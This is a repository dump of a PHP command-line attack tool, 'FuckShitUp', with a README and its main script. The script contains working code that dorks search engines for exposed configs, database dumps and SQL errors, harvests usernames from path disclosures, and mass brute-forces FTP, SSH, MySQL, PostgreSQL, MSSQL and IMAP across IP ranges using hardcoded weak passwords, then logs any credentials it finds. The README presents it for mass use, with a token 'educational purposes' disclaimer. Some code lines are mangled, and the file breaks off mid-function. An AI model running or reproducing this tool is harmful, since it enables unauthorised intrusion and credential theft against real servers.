├── README.md └── fsu.php /README.md: -------------------------------------------------------------------------------- 1 | 2 | ![](https://img.shields.io/badge/fuckshitup-php-purple.svg) 3 | 4 | ## Agenda 5 | 6 | FuckShitUp 0.1 - Multi Vulnerabilities Scanner 7 | 8 | Basically, FSU is bunch of tools written in PHP-CLI. Using build-in functions, you are able to grab url's using search engines - and so, dork for interesting files and full path disclosures. Using list of url's, scanner will look for Cross Site Scripting, Remote File Inclusion, SQL Injection and Local File Inclusion vulnerabilities. It is able to perform mass bruteforce attacks for specific range of hosts, or bruteforce ssh with specific username taken from FPD. Whenever something interesting will be found, like vulnerability or broken auth credentials, data will be saved in .txt files - just like url's, and any other files. FSU is based on PHP and text files, it's still under construction so i am aware of any potential bugs. Principle of operation is simple. 9 | 10 | More url's -> more vuln's. 11 | For educational purposes only. 12 | 13 | ## Intro 14 | 15 | - Data grabbing: 16 | - URL's (geturl/massurl) -> (scan) 17 | - Configs, Databases, SQLi's (dork) 18 | - Full Path Disclosures / Users (fpds) -> (brutefpds) 19 | - Top websites info (top) 20 | 21 | - Massive scanning 22 | - XSS, SQLi, LFI, RFI (scan) 23 | - FTP, SSH, DB's, IMAP (multibruter) 24 | - Accurate SSH bruteforce (brutefpds) 25 | 26 | ## Plan 27 | 28 | - Web Apps 29 | - Grab url's via 'geturl' or 'massurl' (massurl requires list of tags as file) 30 | - Scan url's parameters for vulns with 'scan' 31 | 32 | - Servers 33 | - Pick target, get ip range 34 | - Scan for services on each IP and bruteforce with 'multibruter' 35 | - Grab full path disclosures, and so linux usernames 36 | - Perform SSH bruteforce for specific user with 'brutefpds' 37 | 38 | - Info grabbing 39 | - Use 'dork' for automatic dorking 40 | - Use 'fpds' for full path disclosure grabbing 41 | - Use 'search' for searching someone in ur databases 42 | - Use 'top' for scanning all top websites of specific nation 43 | 44 | - Others 45 | - 'Stat' shows actual statistics and informations 46 | - 'Show' display specific file 47 | - 'Clear' and 'filter' - remove duplicates, remove blacklisted url's 48 | 49 | ## Others 50 | 51 | MultiBrtuer requirements (php5): 52 | - php5-mysql - for mysql connections 53 | - php5-pgsql - for postgresql connections 54 | - libssh2-php - for ssh connections 55 | - php5-sybase - for mssql connections 56 | - php5-imap - for imap connections 57 | 58 | Screens: 59 | - http://i.imgur.com/WKEbVGQ.png 60 | - http://i.imgur.com/PJtYWQk.png 61 | - http://i.imgur.com/o8fyyLQ.png 62 | - http://i.imgur.com/WY8ncBx.png 63 | - http://i.imgur.com/cmoTcPY.png 64 | -------------------------------------------------------------------------------- /fsu.php: -------------------------------------------------------------------------------- 1 | >\n"; 38 | print " |__| |____/ \___ >__|_ \/____ >___| /__||__| |____/| __/ \n"; 39 | print " \/ \/ \/ \/ |__| v0.1\n"; 40 | 41 | print "\n\033[0;37m"; 42 | 43 | print " .---\033[0;38m[SCAN]\033[0;37m-----------------------"."---\033[0;38m[FILES]\033[0;37m---------------------. \n"; 44 | print " | scan - Do it! |"." search - DB's serch |\n"; 45 | print " | multibruter - Brute dat bitch |"." show - Display specific file |\n";; 46 | print " | brutefpds - Brute ssh w/ fpd |"." clear - Remove duplicates |\n";; 47 | print " | stat - Status |"." filter - Filter grab results |\n"; 48 | print " |---\033[0;38m[TARGET]\033[0;37m---------------------"."---\033[0;38m[OTHERS]\033[0;37m--------------------| \n"; 49 | print " | massurl - Massive grabber |"." top - Top sites scanner |\n"; 50 | print " | dork - Well... |"." cmd - Execute OS command |\n"; 51 | print " | geturl - Grab url's |"." help - Shit's right here |\n"; 52 | print " | fpds - Grab fpds & users |"." exit - Quits |\n"; 53 | print " '--------------------------------"."-------------------------------'\n"; 54 | 55 | } 56 | 57 | function geturl() { 58 | 59 | print "\n Dork: "; 60 | $search = fopen ("php://stdin","r"); 61 | $dork = fgets($search); 62 | $dork = trim($dork); 63 | 64 | print "\n Services available: \n"; 65 | print " [1] Interia\n"; 66 | print " [2] Google\n"; 67 | print " [3] Yandex\n"; 68 | print " [4] Onet\n"; 69 | print " Use: "; 70 | 71 | $service = fopen ("php://stdin","r"); 72 | $serv = fgets($search); 73 | print "\n Pages: "; 74 | $count = fopen ("php://stdin","r"); 75 | $start = fgets($count); 76 | $start = trim($start); 77 | print "\n Output filename: "; 78 | $file = fopen ("php://stdin","r"); 79 | $filename = fgets($file); 80 | $filename = trim($filename); 81 | 82 | if($serv == 2) { 83 | 84 | print "\nGrabbing!\n\n"; 85 | 86 | $fp = fopen('out/'.$filename, 'a+'); 87 | for($i=0;$i<$start;$i++) { 88 | 89 | $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&q=".urlencode($dork)."&start=".$i; 90 | $body = file_get_contents($url); 91 | $json = json_decode($body); 92 | $jay = $json->responseData->results; 93 | for($x=0;$xurl)."\n"); 95 | print urldecode($jay[$x]->url)."\n"; 96 | } 97 | } 98 | 99 | 100 | fclose($fp); 101 | 102 | } 103 | 104 | elseif($serv == 4) { 105 | 106 | $fp = fopen('out/'.$filename, 'a+'); 107 | for($i=0; $i <= $start; $i++) { 108 | 109 | $url = "http://szukaj.onet.pl/0,".$i.",query.html?qt=".urlencode($dork); 110 | if(preg_match_all("'\"]*?)\"[^>]*?>(.*?)'si", file_get_contents($url), $links, PREG_PATTERN_ORDER)) 111 | $all_hrefs = array_unique($links[1]); 112 | for($i = 0; $i <= 13; $i++) { 113 | unset($all_hrefs[$i]); 114 | } 115 | for($i = 0; $i <= 4; $i++) { 116 | array_pop($all_hrefs); 117 | } 118 | foreach($all_hrefs as $href) { 119 | fwrite($fp, urldecode($href)."\n"); 120 | print urldecode($href)."\n"; 121 | } 122 | 123 | } 124 | fclose($fp); 125 | } 126 | 127 | 128 | elseif($serv == 3) { 129 | 130 | print "\nGrabbing!\n\n"; 131 | 132 | $fp = fopen('out/'.$filename, 'a+'); 133 | 134 | for($i = 0; $i <= $start; $i++) { 135 | 136 | 137 | $url ='http://www.yandex.com/msearch?p='.$i.'&text='.urlencode($dork); 138 | //$url ='http://yandex.hohli.com/?query='.urlencode($dork).'&page='.$i; 139 | if(preg_match_all("/]*href=\"([^\"]*)\"[^>]*>(.*)<\/a>/siU", file_get_contents($url), $links, PREG_PATTERN_ORDER)) 140 | $all_hrefs = array_unique($links[1]); 141 | foreach($all_hrefs as $href) { 142 | fwrite($fp, urldecode($href)."\n"); 143 | print urldecode($href)."\n"; 144 | } 145 | 146 | } 147 | fclose($fp); 148 | } 149 | 150 | elseif($serv == 1) { 151 | 152 | print "\nGrabbing!\n\n"; 153 | 154 | $fp = fopen('out/'.$filename, 'a+'); 155 | 156 | for($i = 0; $i <= $start; $i++) { 157 | $url ='http://www.google.interia.pl/szukaj,q,'.urlencode($dork).',w,,p,'.$i; 158 | if(preg_match_all("'\"]*?)\"[^>]*?>(.*?)'si", file_get_contents($url), $links, PREG_PATTERN_ORDER)) 159 | $all_hrefs = array_unique($links[1]); 160 | for($i = 0; $i <= 6; $i++) { 161 | unset($all_hrefs[$i]); 162 | } 163 | array_pop($all_hrefs); 164 | foreach($all_hrefs as $href) { 165 | fwrite($fp, urldecode($href)."\n"); 166 | print urldecode($href)."\n"; 167 | } 168 | 169 | } 170 | 171 | } else { 172 | print "Wrong service number."; 173 | } 174 | } 175 | 176 | function url_get_contents ($Url) { 177 | if (!function_exists('curl_init')){ 178 | die('CURL is not installed!'); 179 | } 180 | $ch = curl_init(); 181 | curl_setopt($ch, CURLOPT_URL, $Url); 182 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); 183 | $output = curl_exec($ch); 184 | curl_close($ch); 185 | return $output; 186 | } 187 | 188 | function fpds() { 189 | 190 | print "\n Options:\n"; 191 | print " wp - Wordpress fpd's\n"; 192 | print " presta - PrestaShop fpd's\n"; 193 | print " vb - vBulletin fpd's\n"; 194 | 195 | print "\n What: "; 196 | $handle = fopen ("php://stdin","r"); 197 | $line = fgets($handle); 198 | $lin = trim($line); 199 | 200 | print "\n Domain: "; 201 | $handler = fopen ("php://stdin","r"); 202 | $dom = fgets($handler); 203 | $domain = trim($dom); 204 | 205 | print "\n Pages: "; 206 | $handlerr = fopen ("php://stdin","r"); 207 | $pag = fgets($handlerr); 208 | $page = trim($pag); 209 | 210 | print "\n Output: "; 211 | $handlerrr = fopen ("php://stdin","r"); 212 | $out = fgets($handlerrr); 213 | $output = trim($out); 214 | 215 | 216 | if($lin == 'wp') { 217 | 218 | print "\nGrabbing!\n\n"; 219 | $fp = fopen('out/'.$output.'-tmp.txt', 'a+'); 220 | $dork = 'site:'.$domain.' inurl:"wp-includes/rss-functions.php"'; 221 | 222 | for($i=0;$i<$page;$i++) { 223 | 224 | $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&q=".urlencode($dork)."&start=".$i; 225 | $body = file_get_contents($url); 226 | $json = json_decode($body); 227 | $jay = $json->responseData->results; 228 | for($x=0;$xurl)), $path)) { 231 | print urldecode($jay[$x]->url).":".$path[1]."\n"; 232 | fwrite($fp, urldecode($jay[$x]->url).":".$path[1]."\n"); 233 | } 234 | 235 | } 236 | } 237 | 238 | print "\nClearing the output...\n"; 239 | 240 | passthru('sort out/'.$output.'-tmp.txt | uniq >> out/'.$output.'.txt'); 241 | passthru('rm out/'.$output.'-tmp.txt'); 242 | print "\nDone! Saved as ".$output.".txt!"; 243 | 244 | } 245 | 246 | if($lin == 'presta') { 247 | 248 | print "\nGrabbing!\n\n"; 249 | $fp = fopen('out/'.$output.'-tmp.txt', 'a+'); 250 | $dork = 'site:'.$domain.' inurl:footer.php OR inurl:header.php intext:"FrontController"'; 251 | 252 | for($i=0;$i<$page;$i++) { 253 | 254 | $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&q=".urlencode($dork)."&start=".$i; 255 | $body = file_get_contents($url); 256 | $json = json_decode($body); 257 | $jay = $json->responseData->results; 258 | for($x=0;$xurl)), $path)) { 261 | print urldecode($jay[$x]->url).":".$path[1]."\n"; 262 | fwrite($fp, urldecode($jay[$x]->url).":".$path[1]."\n"); 263 | } 264 | 265 | } 266 | } 267 | 268 | print "\nClearing the output...\n"; 269 | 270 | passthru('sort out/'.$output.'-tmp.txt | uniq >> out/'.$output.'.txt'); 271 | passthru('rm out/'.$output.'-tmp.txt'); 272 | print "\nDone! Saved as ".$output.".txt!"; 273 | 274 | } 275 | 276 | } 277 | 278 | 279 | function multibruter() { 280 | 281 | $users = array('root'); 282 | $passes = array('', 'root', 'test', 'admin', 'zaq123wsx', '1234', '12345', '123456', 'haslo', 'Password123'); 283 | $imap_users = array('postmaster', 'hostmaster', 'master', 'admin', 'administrator', 'test', 'root', 'demo'); 284 | 285 | print "\n Options:\n"; 286 | print " [1] Grab IP\n"; 287 | print " [2] Continue\n"; 288 | print " What: "; 289 | 290 | $check = fopen ("php://stdin","r"); 291 | $czk = fgets($check); 292 | $czk = trim($czk); 293 | 294 | if($czk == 1) { 295 | 296 | print "\n URL: "; 297 | $url = fopen ("php://stdin", "r"); 298 | $www = fgets($url); 299 | $www = trim($www); 300 | $ip = gethostbyname($www); 301 | print "\n IP - ".$ip."\n"; 302 | 303 | } 304 | 305 | elseif($czk == 2) { 306 | 307 | print "\n First IP: "; 308 | $fir = fopen ("php://stdin","r"); 309 | $first = fgets($fir); 310 | $first = trim($first); 311 | 312 | print "\n Last IP: "; 313 | $sec = fopen ("php://stdin","r"); 314 | $second = fgets($sec); 315 | $second = trim($second); 316 | 317 | 318 | if(ip2long($first) && ip2long($second) !== FALSE) { 319 | 320 | print "\n Options:"; 321 | print "\n [1] FTP"; 322 | print "\n [2] SSH"; 323 | print "\n [3] DB's (PgSQL,MySQL,MsSQL)"; 324 | print "\n [4] IMAP"; 325 | print "\n [5] All"; 326 | print "\n What: "; 327 | 328 | $what = fopen ("php://stdin","r"); 329 | $sup = fgets($what); 330 | $sup = trim($sup); 331 | 332 | if($sup == 1 || $sup == 5) { 333 | print "\nFTP user: "; 334 | $ftp = fopen ("php://stdin","r"); 335 | $ftpuser = fgets($ftp); 336 | $ftpuser = trim($ftpuser); 337 | } 338 | 339 | for ($ip = ip2long($first); $ip<=ip2long($second); $ip++) { 340 | 341 | print "\n \033[1;37m[+]\033[0;37m ".long2ip($ip)."\n"; 342 | 343 | if($sup == 1 || $sup == 5) { 344 | if($checkftp = @fsockopen(long2ip($ip), 21, $errno, $errstr, 5)){ 345 | print "\n - FTP found on port 21\n"; 346 | $ftpconn = ftp_connect(long2ip($ip)); 347 | if(ftp_login($ftpconn, 'anonymous', '')) { 348 | $text = date('j/y - G:i') . " - FTP - " . long2ip($ip) . " - Anonymous login\n"; 349 | $handle = fopen('out/multibruter.txt', 'a+'); 350 | fwrite($handle, $text); 351 | fclose($handle); 352 | 353 | print "\033[1;37mAnonymous login allowed!\033[0;37m\n"; 354 | print " - General info\n"; 355 | print " Files in directory (".ftp_pwd($ftpconn).") :\n"; 356 | $ftpfiles = ftp_rawlist($ftpconn, ftp_pwd($ftpconn)); 357 | foreach ($ftpfiles as $plik) { 358 | print $plik."\n"; 359 | } 360 | ftp_close($ftpconn); 361 | } else { 362 | print " - FTP anonymous login not allowed\n"; 363 | ftp_close($ftpconn); 364 | } 365 | 366 | 367 | if($ftpuser != '') { 368 | print "\n Bruteforcing...\n"; 369 | foreach ($passes as $haslo){ 370 | $ftpconn = ftp_connect(long2ip($ip)); 371 | if(ftp_login($ftpconn, $ftpuser, $haslo)) { 372 | $text = date('j/y - G:i') . " - FTP - " . long2ip($ip) . " - ".$ftpuser.":".$haslo."\n"; 373 | $handle = fopen('out/multibruter.txt', 'a+'); 374 | fwrite($handle, $text); 375 | fclose($handle); 376 | 377 | print "\033[1;37m" . $ftpuser . ':' . $haslo . " - Success!\033[0;37m\n"; 378 | print " - General info\n"; 379 | print " Current directory - ".ftp_pwd($ftpconn)."\n"; 380 | print " Files in directory:\n"; 381 | $ftpfiles = ftp_rawlist($ftpconn, ftp_pwd($ftpconn)); 382 | foreach ($ftpfiles as $plik) { 383 | echo $plik."\n"; 384 | } 385 | ftp_close($ftpconn); 386 | break; 387 | } else { 388 | echo $ftpuser . ':' . $haslo . "\n"; 389 | } 390 | } 391 | } else { 392 | print "\nFTP user is not defined, wont bruteforce.\n"; 393 | } 394 | 395 | } else { 396 | print "\n - FTP seems not working (21)\n"; 397 | } 398 | } 399 | 400 | if($sup == 2 || $sup == 5) { 401 | 402 | if($checkssh = fsockopen(long2ip($ip), 22, $errno, $errstr, 5)) { 403 | print "\n - SSH found on port 22\n"; 404 | print "\n Bruteforcing...\n"; 405 | 406 | $sshconn = ssh2_connect(long2ip($ip), 22); 407 | 408 | foreach ($users as $uzytkownik){ 409 | foreach ($passes as $haslo){ 410 | 411 | if(ssh2_auth_password($sshconn, $uzytkownik, $haslo)) 412 | { 413 | print "\033[1;37m" . $uzytkownik . ':' . $haslo . " - Success! \033[0;37m\n"; 414 | $text = date('j/y - G:i') . " - SSH - " . long2ip($ip) . " - ".$uzytkownik.":".$haslo."\n"; 415 | $handle = fopen('out/multibruter.txt', 'a+'); 416 | fwrite($handle, $text); 417 | fclose($handle); 418 | ssh2_exec($sshconn, 'exit'); 419 | break; 420 | } else { 421 | print $uzytkownik . ":" . $haslo . "\n"; 422 | } 423 | 424 | } 425 | } 426 | } else { 427 | print "\n - SSH seems not working (22)\n"; 428 | } 429 | 430 | } 431 | 432 | 433 | if($sup == 3 || $sup == 5) { 434 | 435 | if ($checkmssql = fsockopen(long2ip($ip), 1433, $errno, $errstr, 5)) { 436 | print "\n - MsSQL found on port 1433\n"; 437 | print "\n Bruteforcing...\n"; 438 | $mssqluser = 'sa'; 439 | foreach ($passes as $haslo) { 440 | $mssqlconn = mssql_connect(long2ip($ip), $mssqluser, $haslo); 441 | if($mssqlconn) { 442 | 443 | print "\033[1;37m" . $mssqluser . ':' . $haslo . " - Success! \033[0;37m\n"; 444 | $text = date('j/y - G:i') . " - MsSQL - " . long2ip($ip) . " - ".$mssqluser.":".$haslo."\n"; 445 | $handle = fopen('out/multibruter.txt', 'a+'); 446 | fwrite($handle, $text); 447 | fclose($handle); 448 | 449 | pg_close($mssqlconn); 450 | } else { 451 | print $mssqluser . ':' . $haslo . "\n"; 452 | } 453 | } 454 | } else { 455 | print "\n - MsSQL seems not working (1433)\n"; 456 | } 457 | 458 | if(fsockopen(long2ip($ip), 3306, $errno, $errstr, 5)){ 459 | print "\n - MySQL found on port 3306. \n"; 460 | print "\n Bruteforcing...\n"; 461 | foreach ($users as $uzytkownik){ 462 | foreach ($passes as $haslo){ 463 | $conn = mysql_connect(long2ip($ip), $uzytkownik, $haslo); 464 | if ($conn) { 465 | 466 | print "\033[1;37m" . $uzytkownik . ':' . $haslo . " - Success! \033[0;37m\n"; 467 | $text = date('j/y - G:i') . " - MySQL - " . long2ip($ip) . " - ".$mssqluser.":".$haslo."\n"; 468 | $handle = fopen('out/multibruter.txt', 'a+'); 469 | fwrite($handle, $text); 470 | fclose($handle); 471 | 472 | $dbuser = mysql_query("SELECT USER();"); 473 | $dbuzer = mysql_fetch_row($dbuser); 474 | $dbdb = mysql_query("SELECT DATABASE();"); 475 | $dbd = mysql_fetch_row($dbdb); 476 | print "\nGeneral info\n"; 477 | print "MySql version - ".mysql_get_client_info()."\n"; 478 | print "Host info - ".mysql_get_host_info()."\n"; 479 | print "Current user - ".$dbuzer[0]."\n"; 480 | 481 | print "\nDatabases\n"; 482 | $res = mysql_query("SHOW DATABASES"); 483 | 484 | while ($row = mysql_fetch_assoc($res)) { 485 | print $row['Database'] . "\n"; 486 | } 487 | 488 | mysql_close($conn); 489 | break; 490 | } else { 491 | print $uzytkownik . ':' . $haslo . "\n"; 492 | } 493 | } 494 | 495 | } 496 | } else { 497 | print "\n - MySQL seems not working (3306)\n"; 498 | } 499 | 500 | $checkpgsql = fsockopen(long2ip($ip), 5432, $errno, $errstr, 5); 501 | if($checkpgsql){ 502 | print "\n - PostgreSQL found on port 5432\n"; 503 | print "\n Bruteforcing...\n"; 504 | $pguser = 'postgres'; 505 | foreach ($passes as $haslo) { 506 | $pgconn = pg_connect("host=".long2ip($ip)." user=".$pguser." password=".$haslo); 507 | if ($pgconn) { 508 | 509 | print "\033[1;37m" . $pguser . ':' . $haslo . " - Success! \033[0;37m\n"; 510 | $text = date('j/y - G:i') . " - PgSQL - " . long2ip($ip) . " - ".$pguser.":".$haslo."\n"; 511 | $handle = fopen('out/multibruter.txt', 'a+'); 512 | fwrite($handle, $text); 513 | fclose($handle); 514 | 515 | print "\nGeneral info\n"; 516 | print "Version - ".pg_version($pgconn)."\n"; 517 | print "Host - ".pg_host($pgconn)."\n"; 518 | pg_close($pgconn); 519 | } else 520 | { 521 | print $pguser . ':' . $haslo . "\n"; 522 | } 523 | } 524 | 525 | } else { 526 | print "\n - PostgreSQL seems not working (5432)\n"; 527 | } 528 | } 529 | 530 | if($sup == 4 || $sup == 5) { 531 | 532 | if ($checkimap = fsockopen(long2ip($ip), 143, $errno, $errstr, 5)) { 533 | print "\n - IMAP found on port 143 \n"; 534 | print "\n Bruteforcing...\n"; 535 | foreach ($imap_users as $uzytkownik) { 536 | foreach ($passes as $haslo) { 537 | $mailbox = imap_open("{".long2ip($ip).":143}", $uzytkownik, $haslo); 538 | if ($mailbox) { 539 | print "\033[1;37m" . $uzytkownik . ':' . $haslo . " - Success! \033[0;37m\n"; 540 | $text = date('j/y - G:i') . " - IMAP - " . long2ip($ip) . " - ".$uzytkownik.":".$haslo."\n"; 541 | $handle = fopen('out/multibruter.txt', 'a+'); 542 | fwrite($handle, $text); 543 | fclose($handle); 544 | imap_close($mailbox); 545 | break; 546 | } else { 547 | print $uzytkownik . ":" . $haslo . "\n"; 548 | } 549 | } 550 | 551 | } 552 | } else { 553 | print "\n - IMAP seems not working (143)\n"; 554 | } 555 | 556 | } 557 | 558 | } 559 | 560 | 561 | 562 | } else { 563 | print "\nWrong IP adress.\n"; 564 | } 565 | } 566 | } 567 | 568 | function brutefpds() { 569 | 570 | print "\n FPD's file: "; 571 | $handle = fopen ("php://stdin","r"); 572 | $fil = fgets($handle); 573 | $file = trim($fil); 574 | 575 | if(file_exists('out/'.$file)) { 576 | 577 | $lines = file('out/'.$file); 578 | foreach($lines as $line) { 579 | 580 | $stuff = explode(':', $line); 581 | $url = $stuff[0].':'.$stuff[1]; 582 | $url = parse_url($url); 583 | 584 | print "\n [+] Trying ".$url['host']." (".gethostbyname($url['host']).") with user ".$stuff[2]."\n"; 585 | 586 | if($checkssh = fsockopen(gethostbyname($url['host']), 22, $errno, $errstr, 5)) { 587 | print "- SSH found on port 22\n"; 588 | print "\n Bruteforcing...\n"; 589 | 590 | $sshconn = ssh2_connect(gethostbyname($url['host']), 22); 591 | $uzytkownik = trim($stuff[2]); 592 | $passes = array('', 'root', 'test', 'admin', 'zaq123wsx', '1234', '12345', '123456', 'haslo', 'Password123'); 593 | 594 | foreach ($passes as $haslo){ 595 | 596 | if(ssh2_auth_password($sshconn, $uzytkownik, $haslo)) 597 | { 598 | print "\033[1;37m" . $uzytkownik . ':' . $haslo . " - Success! \033[0;37m\n"; 599 | $text = date('j/y - G:i') . " - SSH - " . gethostbyname($url['host']) . " - ".$uzytkownik.":".$haslo."\n"; 600 | $handle = fopen('out/brutedfpds.txt', 'a+'); 601 | fwrite($handle, $text); 602 | fclose($handle); 603 | ssh2_exec($sshconn, 'exit'); 604 | break; 605 | } else { 606 | print $uzytkownik . ":" . $haslo . "\n"; 607 | } 608 | 609 | } 610 | 611 | } else { 612 | print " - SSH seems not working (22)\n"; 613 | } 614 | 615 | } 616 | 617 | } else { 618 | print "\nFile doesn't exist!\n"; 619 | } 620 | 621 | } 622 | 623 | function dork() { 624 | 625 | print "\n Options: \n"; 626 | print " [1] Configs (inc,bak,old)\n"; 627 | print " [2] Databases - (sql,configs)\n"; 628 | print " [3] SQLi (error based)\n"; 629 | print " What: "; 630 | 631 | $choice = fopen ("php://stdin","r"); 632 | $what = fgets($choice); 633 | 634 | 635 | print "\n Options:\n"; 636 | print " [1] Display\n"; 637 | print " [2] Save to file\n"; 638 | print " [3] Both\n"; 639 | print " What: "; 640 | 641 | $sup = fopen ("php://stdin","r"); 642 | $yo = fgets($sup); 643 | 644 | print "\n"; 645 | 646 | for($i = 0; $i <=3 ; $i++) { 647 | if($what == 1) { 648 | 649 | $url1 = 'http://www.google.interia.pl/szukaj,q,'.urlencode('ext:bak').',w,pl,p,'.$i; 650 | $url2 = 'http://www.google.interia.pl/szukaj,q,'.urlencode('ext:inc').',w,pl,p,'.$i; 651 | $url3 = 'http://www.google.interia.pl/szukaj,q,'.urlencode('ext:old').',w,pl,p,'.$i; 652 | $shit = array($url1, $url2, $url3); 653 | } 654 | if($what == 2) { 655 | $url1 = 'http://www.google.interia.pl/szukaj,q,'.urlencode('ext:sql').',w,pl,p,'.$i; 656 | $url2 = 'http://www.google.interia.pl/szukaj,q,'.urlencode('ext:inc mysql_connect').',w,pl,p,'.$i; 657 | $url2 = 'http://www.google.interia.pl/szukaj,q,'.urlencode('ext:inc mysql_pconnect').',w,pl,p,'.$i; 658 | $shit = array($url1, $url2, $url3); } 659 | if($what == 3) { 660 | $url1 = 'http://www.google.interia.pl/szukaj,q,'.urlencode('intext:"error in your SQL syntax" " .php').',w,pl,p,'.$i; 661 | $url2 = 'http://www.google.interia.pl/szukaj,q,'.urlencode('intext:"supplied argument is not a valid MySQL" " .php').',w,pl,p,'.$i; 662 | $shit = array($url1, $url2, $url3); 663 | } 664 | foreach($shit as $url) { 665 | if (preg_match("/(youtube)/(facebook)|(lastfm)/(github)/(wikipedia)/(stackoverflow)/(wykop)/(filmweb)/(allegro)/", $url) == FALSE) { 666 | if(preg_match_all("'\"]*?)\"[^>]*?>(.*?)'si", file_get_contents($url), $links, PREG_PATTERN_ORDER)) 667 | $all_hrefs = array_unique($links[1]); 668 | unset($all_hrefs[0]); 669 | unset($all_hrefs[1]); 670 | unset($all_hrefs[2]); 671 | unset($all_hrefs[3]); 672 | unset($all_hrefs[4]); 673 | unset($all_hrefs[5]); 674 | unset($all_hrefs[6]); 675 | array_pop($all_hrefs); 676 | foreach($all_hrefs as $href) { 677 | if($yo == 2 || $yo == 3) { 678 | $fp = fopen('out/'.'d0rks.txt', 'a+'); 679 | $text = date('j/y - G:i') . " - " . urldecode($href); 680 | fwrite($fp, $text."\n"); 681 | fclose($fp); 682 | } 683 | if ($yo == 1 || $yo == 3) { 684 | print " - ".urldecode($href)."\n"; 685 | } 686 | } 687 | 688 | } 689 | } 690 | } 691 | 692 | } 693 | 694 | function top() { 695 | 696 | print "\n Options:\n"; 697 | print " [1] Display urls\n"; 698 | print " [2] Grab some info\n"; 699 | print " What: "; 700 | 701 | $what = fopen ("php://stdin","r"); 702 | $sup = fgets($what); 703 | $sup = trim($sup); 704 | 705 | print "\n Domain: "; 706 | $dmn = fopen ("php://stdin","r"); 707 | $domain = fgets($dmn); 708 | $domain = strtoupper(trim($domain)); 709 | 710 | if($sup == 2) { 711 | $crawl = array('.htaccess', 'sql/', 'phpmyadmin/', 'robots.txt', 'info.php', 'administrator/', 'admin/', 'cms/', 'server-status/', 'config.php.bak', 'index.php.bak'); 712 | $ports = array(21, 22, 23, 25, 53, 80, 110, 143, 443, 465, 3690, 1433, 3306, 5432, 8080); 713 | $x = 0; 714 | for($i=0; $i<=20; $i++) { 715 | 716 | $url = 'http://www.alexa.com/topsites/countries;'.$i.'/'.$domain; 717 | 718 | if(preg_match_all("'(.*?)'si", file_get_contents($url), $links, PREG_PATTERN_ORDER)) 719 | $all_hrefs = array_unique($links[1]); 720 | foreach($all_hrefs as $href) { 721 | 722 | if(strpos($href, "siteinfo")) { 723 | $uri = explode("/", $href); 724 | $adres = urldecode($uri[2]); 725 | $x++; 726 | print "\n $x. ".$adres." - ".gethostbyname($adres)."\n"; 727 | 728 | print "\nOpen ports: "; 729 | foreach($ports as $port) { 730 | if($look = @fsockopen(gethostbyname($adres), $port, $err, $err_string, 1)) { 731 | echo $port.', '; 732 | fclose($look); 733 | } 734 | } 735 | 736 | 737 | print "\nCrawling...\n"; 738 | foreach ($crawl as $url) { 739 | $urlnew = 'http://'.$adres.'/'.$url; 740 | $ch = curl_init($urlnew); 741 | curl_setopt($ch, CURLOPT_NOBODY, true); 742 | curl_exec($ch); 743 | $status = curl_getinfo($ch, CURLINFO_HTTP_CODE); 744 | 745 | if($status == 200){ 746 | echo " ".$url." (".$status.")\n"; 747 | } 748 | curl_close($ch); 749 | } 750 | 751 | passthru('dig any '.$adres); 752 | 753 | 754 | 755 | } 756 | } 757 | } 758 | } elseif($sup == 1) { 759 | 760 | $x = 0; 761 | 762 | for($i=0; $i<=20; $i++) { 763 | 764 | $url = 'http://www.alexa.com/topsites/countries;'.$i.'/'.$domain; 765 | 766 | if(preg_match_all("'(.*?)'si", file_get_contents($url), $links, PREG_PATTERN_ORDER)) 767 | $all_hrefs = array_unique($links[1]); 768 | foreach($all_hrefs as $href) { 769 | if(strpos($href, "siteinfo")) { 770 | $uri = explode("/", $href); 771 | $adres = urldecode($uri[2]); 772 | $x++; 773 | print $x.'. '.$adres."\n"; 774 | 775 | } 776 | } 777 | } 778 | 779 | } 780 | } 781 | 782 | 783 | function filter() { 784 | 785 | print "\n File: "; 786 | $filet = fopen ("php://stdin","r"); 787 | $file = fgets($filet); 788 | $file = trim($file); 789 | 790 | if(file_exists('out/'.$file)) { 791 | 792 | $urls = file('out/'.$file); 793 | $urls = array_unique($urls); 794 | foreach($urls as $url) { 795 | // if (preg_match("/(filmweb)/(forum)/(hip-hop.pl)/(youtube)/(facebook)|(lastfm)/(github)/(wikipedia)/(stackoverflow)/(wykop)/(allegro)/", $url) == FALSE && strpos($url, "=")) { 796 | if (preg_match('#\b(filmweb|forum|google|reddit|hip-hop.pl|youtube|facebook|lastfm|github|wikipedia|stackoverflow|wykop|allegro|phpbb|simplemachines|smf)\b#', $url) == FALSE && strpos($url, "=")) { 797 | $fp = fopen('out/filtered-'.$file, 'a+'); 798 | fwrite($fp, $url."\n"); 799 | fclose($fp); 800 | } 801 | 802 | } 803 | print "\n\nDone! Saved as filtered-".$file."\n"; 804 | } else { 805 | print "\nFile doesn't exist!"; 806 | } 807 | 808 | } 809 | 810 | function massurl() { 811 | 812 | print "\n Tags: "; 813 | $filet = fopen ("php://stdin","r"); 814 | $tags = fgets($filet); 815 | $tags = trim($tags); 816 | print "\n Output: "; 817 | $fileo = fopen ("php://stdin","r"); 818 | $output = fgets($fileo); 819 | $output = trim($output); 820 | 821 | if(file_exists('out/'.$tags)) { 822 | 823 | $tags = file('out/'.$tags); 824 | foreach($tags as $tag) { 825 | for($i = 0;$i < 3; $i++) { 826 | $url = 'http://www.google.interia.pl/szukaj,q,'.$tag.' .php'.',w,pl,p,'.$i; 827 | if(preg_match_all("'\"]*?)\"[^>]*?>(.*?)'si", file_get_contents($url), $links, PREG_PATTERN_ORDER)) 828 | { 829 | $all_hrefs = array_unique($links[1]); 830 | unset($all_hrefs[0]); 831 | unset($all_hrefs[1]); 832 | unset($all_hrefs[2]); 833 | unset($all_hrefs[3]); 834 | unset($all_hrefs[4]); 835 | unset($all_hrefs[5]); 836 | unset($all_hrefs[6]); 837 | array_pop($all_hrefs); 838 | foreach($all_hrefs as $href) { 839 | $fp = fopen('out/'.$output, 'a+'); 840 | $text = urldecode($href)."\n"; 841 | fwrite($fp, $text); 842 | print " - ".urldecode($href)."\n"; 843 | 844 | } 845 | } 846 | } 847 | } 848 | 849 | 850 | 851 | } else { 852 | print "\nFile ".$tags." doesnt exist!"; 853 | } 854 | 855 | } 856 | 857 | function blind_sqli($link) { 858 | $cleanHashCode = hash_file(file_get_contents($link)); 859 | 860 | //first check if website is dynamic 861 | if($cleanHashCode == hash_file(file_get_contents($link))) 862 | { 863 | 864 | 